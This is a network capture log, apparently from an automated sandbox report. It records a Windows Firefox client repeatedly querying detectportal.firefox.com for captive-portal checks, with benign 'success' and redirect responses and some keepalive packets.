Dec 13, 2024 18:58:18.182048082 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21529 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:58:39.379949093 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:58:39.694833040 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21550 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:58:40.613405943 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:58:40.930771112 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21551 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 18:58:41.838526011 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 18:58:42.153084993 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21553 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 19:00:20.149786949 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 19:00:20.465084076 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21651 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 13, 2024 19:00:40.411849976 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 13, 2024 19:00:40.727382898 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 11:59:29 GMT Age: 21671 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.7	50105	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:55:15.847393990 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:16.936434031 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27602 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:16.978477001 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:17.294020891 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27603 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:17.376041889 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:17.691601992 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27603 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:17.902120113 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:18.219125032 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27604 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:18.274504900 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:18.591351032 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27604 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:19.119837999 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:19.435884953 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27605 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:20.408787966 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:20.724803925 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27606 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:21.817573071 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:22.132832050 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27607 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:23.078674078 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:23.394057989 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27609 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:33.216761112 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:33.532059908 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27619 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:39.378911972 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:39.709678888 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27625 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:42.969583035 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:43.285337925 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27629 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:44.308685064 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:44.630546093 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27630 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:48.661293983 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:48.978190899 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27634 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:55:55.385379076 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:55:55.713736057 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27641 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:56:05.810230970 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:12.886682034 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:56:13.203727961 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27659 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:56:14.202547073 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:56:14.517468929 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27660 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:56:24.613070965 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:34.807060003 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:37.044660091 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:56:37.361337900 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27683 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:56:47.415019989 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:56:57.611037970 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:07.808491945 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:18.011610985 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:28.207822084 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:38.403999090 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:48.617846012 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 13, 2024 18:57:58.562889099 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:57:58.881314039 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27764 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:58:16.312422991 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:58:16.632049084 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27782 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 13, 2024 18:58:17.546277046 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 13, 2024 18:58:17.862111092 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 10:15:14 GMT Age: 27783 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
